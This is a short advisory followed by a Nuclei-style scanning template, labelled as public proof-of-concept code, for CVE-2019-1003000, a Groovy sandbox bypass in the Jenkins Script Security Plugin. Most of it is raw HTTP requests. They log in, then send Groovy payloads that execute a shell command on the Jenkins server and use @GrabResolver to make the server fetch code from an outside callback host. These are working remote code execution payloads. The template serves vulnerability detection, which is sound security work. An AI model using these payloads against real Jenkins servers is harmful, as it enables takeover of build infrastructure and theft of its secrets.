A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
PoC代码[已公开]
id: CVE-2019-1003000
info:
name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass
author: sttlr
severity: high
description: |
A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-1003000
epss-score: 0.94445
epss-percentile: 0.9999
cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::*
reference:
- https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266
- http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming
- https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins
- https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION
- https://github.com/purple-WL/Jenkins_CVE-2019-1003000
- https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
metadata:
verified: true
max-request: 6
vendor: jenkins
product: script_security
tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated
variables:
username: admin
vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}"
app_name: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && (http(3) || http(4))
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "jenkins"
internal: true
case-insensitive: true
- raw:
- |
POST /j_acegi_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(tolower(body_2), "jenkins", "/logout")'
internal: true
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- raw:
- |
GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"
# digest: 4a0a0047304502206dcb98dab324576abb797e15266f36d95adeaa53e3a3990fa34f4e4831ab1c13022100df9943792a88e5b62c2f47d6160bccd628ec69bbb505c226578fb60da9fadecc:922c64590222798bb761d5b6d8e72950